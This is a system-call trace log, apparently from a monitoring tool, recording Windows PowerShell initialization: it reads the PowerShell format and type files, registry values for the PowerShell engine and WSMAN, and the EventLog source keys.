File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, size = 4096, size_out = 436	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = 0, type = REG_SZ	2	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell, value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, type = file_attributes	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, type = file_attributes	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 4096, size_out = 4096	6	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 4096, size_out = 2530	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 542, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 4096	5	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 4018	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 78, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 4096	6	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 2762	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 310, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, size = 4096, size_out = 4096	17	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, size = 4096, size_out = 3022	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, size = 50, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, size = 4096, size_out = 4096	6	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, size = 4096, size_out = 281	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, type = file_type	2	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, size = 4096, size_out = 4096	62	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, size = 4096, size_out = 3895	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, size = 201, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, size = 4096, size_out = 4096	21	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, size = 4096, size_out = 3687	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, size = 409, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, size = 4096, size_out = 4096	4	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, size = 4096, size_out = 2228	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, size = 844, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
File	Create	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, size = 4096, size_out = 4096	4	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, size = 4096, size_out = 3736	1	Fn Data
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, size = 360, size_out = 0	1	Fn
File	Read	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, size = 4096, size_out = 0	1	Fn
File	Get Info	filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, type = file_attributes	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	7	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 2.0, type = REG_SZ	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Enumerate Values	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 0, type = REG_SZ	1	Fn
Registry	Read Value	reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 2.0, type = REG_SZ	1	Fn
Environment	Get Environment String	name = MshEnableTrace	2	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Get Key Info	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Enumerate Keys	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell	1	Fn
Registry	Open Key	reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell	1	Fn
